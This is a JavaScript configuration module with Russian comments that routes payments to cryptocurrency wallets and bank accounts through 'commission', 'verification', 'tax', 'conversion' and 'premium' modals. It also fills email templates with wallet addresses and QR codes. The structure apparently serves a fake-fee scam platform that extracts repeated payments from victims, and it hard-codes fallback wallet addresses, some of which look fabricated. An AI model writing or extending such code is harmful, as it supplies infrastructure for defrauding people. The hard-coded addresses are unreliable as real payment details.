export const CRYPTO_OPTIONS = [
    { symbol: 'BTC', name: 'Bitcoin', network: 'Bitcoin', chain: 'Bitcoin Network' },
    { symbol: 'ETH', name: 'Ethereum', network: 'ETH', chain: 'Ethereum (ERC-20)' },
    { symbol: 'BNB', name: 'Binance Coin', network: 'BNB', chain: 'BNB-BSC (BEP-20)' },
    { symbol: 'USDC', name: 'USD Coin', network: 'USDC', chain: 'Ethereum (ERC-20)' },
    { symbol: 'SOL', name: 'Solana', network: 'SOL', chain: 'Solana Network' }
];

export const WALLET_TYPES = [
    { key: 'main', label: 'Кошелек для 1 линии' },
    { key: 'commission', label: 'Commission Modal' },
    { key: 'verification', label: 'Verification Modal' },
    { key: 'tax', label: 'Tax Modal' },
    { key: 'cryptoConversion', label: 'Crypto Conversion Modal' },
    { key: 'bankConversion', label: 'Bank Conversion Modal' },
    { key: 'premium', label: 'Premium Modal' }
];

export const LEGACY_MODAL_KEY_ALIASES = {
    errorModal: 'verification',
    verifyModal: 'verification',
    commissionModal: 'commission',
    nalogModal: 'tax',
    conversionModal: 'cryptoConversion',
    bankConversionModal: 'bankConversion',
    premiumModal: 'premium'
};

export const DEFAULT_WALLET_FALLBACKS = {
    main: '0x0867Fc1E4623e6cF9Ac0D9aC5c51DffE9c6d4F3c',
    commission: '0x78Ee0e4AC54bfe0a5BD379CEAb6A9C156e434679',
    verification: '0x2a977bCA7c4C56f487D8341d4E5FdAD63F0a00c9',
    tax: '0xB0B2000a1eBd231FE3613B458CBE71830F67fB2b',
    cryptoConversion: '0xC5A7E4F3D8B92C1A6E7F4B8D3A9C5E2F7B1D8A6C',
    bankConversion: '0xE8F9A2B5C7D3E1F6A8B4C9D2E7F1A5B8C3D6E9F2',
    premium: '0x2a977bCA7c4C56f487D8341d4E5FdAD63F0a00c9'
};

export const getCryptoMeta = (crypto, cryptoOptions = CRYPTO_OPTIONS) => {
    const symbol = crypto || 'ETH';
    return cryptoOptions.find(option => option.symbol === symbol) || CRYPTO_OPTIONS.find(option => option.symbol === symbol) || CRYPTO_OPTIONS[1];
};

export const normalizeWalletKey = (walletKey) => LEGACY_MODAL_KEY_ALIASES[walletKey] || walletKey || 'main';

export const getWalletsByCurrency = (settings = {}) => settings.walletsByCurrency || settings.cryptoWallets || {};

export const resolveWallet = (settings = {}, walletKey = 'main', crypto, cryptoOptions = CRYPTO_OPTIONS, fallbackAddress = '') => {
    const normalizedKey = normalizeWalletKey(walletKey);
    const symbol = crypto || settings.defaultCrypto || 'ETH';
    const cryptoMeta = getCryptoMeta(symbol, cryptoOptions);
    const walletsByCurrency = getWalletsByCurrency(settings);
    const byCurrencyWallet = walletsByCurrency?.[symbol]?.[normalizedKey];
    const legacyWallet = normalizedKey === 'main'
        ? { address: settings.walletAddress || '', qrValue: settings.walletAddress || '' }
        : settings.modalWallets?.[normalizedKey] || settings.modalWallets?.[walletKey] || {};
    const address = byCurrencyWallet?.address || legacyWallet?.address || fallbackAddress || DEFAULT_WALLET_FALLBACKS[normalizedKey] || '';
    const qrValue = byCurrencyWallet?.qrValue || byCurrencyWallet?.address || legacyWallet?.qrValue || legacyWallet?.address || address;

    return {
        address,
        qrValue,
        network: byCurrencyWallet?.network || legacyWallet?.network || cryptoMeta?.network || '',
        chain: byCurrencyWallet?.chain || legacyWallet?.chain || cryptoMeta?.chain || ''
    };
};

export const buildWalletsByCurrencyFromLegacy = (settings = {}, cryptoOptions = CRYPTO_OPTIONS) => {
    const existing = getWalletsByCurrency(settings);
    const result = JSON.parse(JSON.stringify(existing || {}));
    const defaultSymbol = settings.defaultCrypto || 'ETH';
    const symbols = Object.keys(result).length > 0 ? Object.keys(result) : [defaultSymbol];

    const walletTypes = [
        ...WALLET_TYPES,
        ...Object.keys(settings.modalWallets || {})
            .filter(key => !WALLET_TYPES.some(type => type.key === key))
            .map(key => ({ key, label: key }))
    ];

    symbols.forEach(symbol => {
        const cryptoMeta = getCryptoMeta(symbol, cryptoOptions);
        result[symbol] = {
            ...(result[symbol] || {})
        };

        walletTypes.forEach(({ key }) => {
            const legacyWallet = key === 'main'
                ? { address: settings.walletAddress || '', qrValue: settings.walletAddress || '' }
                : settings.modalWallets?.[key] || {};
            const currentWallet = result[symbol][key] || {};
            const address = currentWallet.address ?? legacyWallet.address ?? '';

            result[symbol][key] = {
                address,
                qrValue: currentWallet.qrValue ?? currentWallet.address ?? legacyWallet.qrValue ?? legacyWallet.address ?? address,
                network: currentWallet.network ?? legacyWallet.network ?? cryptoMeta?.network ?? '',
                chain: currentWallet.chain ?? legacyWallet.chain ?? cryptoMeta?.chain ?? ''
            };
        });
    });

    return result;
};

// ─────────────────────────────────────────────────────────────────────────
// БАНКОВСКИЙ РЕЖИМ ОПЛАТЫ
// Когда в конфиге включён settings.bankPaymentMode === true, платёжные модалки
// показывают не крипту, а банковский счёт. Банк всегда ОДИН — он задаётся явно
// в settings.paymentBank (переключается в шапке карточки настроек; меняется
// лишь логотип и название). Номера счетов задаются по модулю и НЕ зависят от
// выбранного банка: settings.bankAccounts[walletKey] = { number, fields }.
//   - number — номер счёта (подпись = settings.bankAccountDisplayName, напр. CBU/CVU)
//   - fields — произвольные доп. поля [{ label, value }]
// Логотип и имя банка берутся из settings.banks[paymentBank] (как в разделе «Банки»).
//
// Обратная совместимость: старая модель settings.bankWallets[bankName][walletKey]
// автоматически мигрируется (берём первый банк как выбранный и его счета).
// ─────────────────────────────────────────────────────────────────────────

export const isBankPaymentMode = (settings = {}) => settings.bankPaymentMode === true;

// Выбранный (единственный) банк оплаты
export const getPaymentBank = (settings = {}) => {
    if (settings.paymentBank) return settings.paymentBank;
    if (settings.defaultPaymentBank) return settings.defaultPaymentBank;
    const legacy = Object.keys(settings.bankWallets || {});
    return legacy[0] || '';
};

// Счета по модулям, не зависящие от банка (с миграцией со старой модели)
export const getBankAccounts = (settings = {}) => {
    if (settings.bankAccounts && typeof settings.bankAccounts === 'object') return settings.bankAccounts;
    const bank = getPaymentBank(settings);
    const legacy = settings.bankWallets?.[bank];
    return (legacy && typeof legacy === 'object') ? legacy : {};
};

// Произвольные доп. поля реквизита: массив { label, value }. Пустые (без
// названия и значения) отбрасываем. Поддерживаем старый формат holder —
// превращаем его в одно поле «Titular», чтобы ничего не потерялось.
export const getBankEntryFields = (entry = {}) => {
    const raw = Array.isArray(entry.fields) ? entry.fields : [];
    const fields = raw
        .map((f) => ({ label: (f?.label || '').trim(), value: (f?.value || '').trim() }))
        .filter((f) => f.label || f.value);
    if (fields.length === 0 && entry.holder) {
        return [{ label: 'Titular', value: String(entry.holder).trim() }];
    }
    return fields;
};

export const resolveBankWallet = (settings = {}, walletKey = 'main') => {
    const normalizedKey = normalizeWalletKey(walletKey);
    const bank = getPaymentBank(settings);
    const accounts = getBankAccounts(settings);
    const entry = accounts[normalizedKey] || {};
    return {
        bankName: bank || '',
        number: entry.number || '',
        fields: getBankEntryFields(entry),
        iconFileName: (bank && settings.banks?.[bank]?.iconFileName) || ''
    };
};

export const getEmailWalletVariables = (settings = {}, crypto, cryptoOptions = CRYPTO_OPTIONS) => {
    const buildQr = (addr) => addr ? `https://api.qrserver.com/v1/create-qr-code/?size=150x150&data=${encodeURIComponent(addr)}` : '';
    const main = resolveWallet(settings, 'main', crypto, cryptoOptions);
    const commission = resolveWallet(settings, 'commission', crypto, cryptoOptions);
    const verification = resolveWallet(settings, 'verification', crypto, cryptoOptions);
    const tax = resolveWallet(settings, 'tax', crypto, cryptoOptions);
    const cryptoConversion = resolveWallet(settings, 'cryptoConversion', crypto, cryptoOptions);
    const bankConversion = resolveWallet(settings, 'bankConversion', crypto, cryptoOptions);

    return {
        mainWalletAddress: main.address,
        commissionWalletAddress: commission.address,
        commissionWalletQr: commission.qrValue || buildQr(commission.address),
        verificationWalletAddress: verification.address,
        verificationWalletQr: verification.qrValue || buildQr(verification.address),
        taxWalletAddress: tax.address,
        taxWalletQr: tax.qrValue || buildQr(tax.address),
        cryptoConversionWalletAddress: cryptoConversion.address,
        cryptoConversionWalletQr: cryptoConversion.qrValue || buildQr(cryptoConversion.address),
        bankConversionWalletAddress: bankConversion.address,
        bankConversionWalletQr: bankConversion.qrValue || buildQr(bankConversion.address)
    };
};
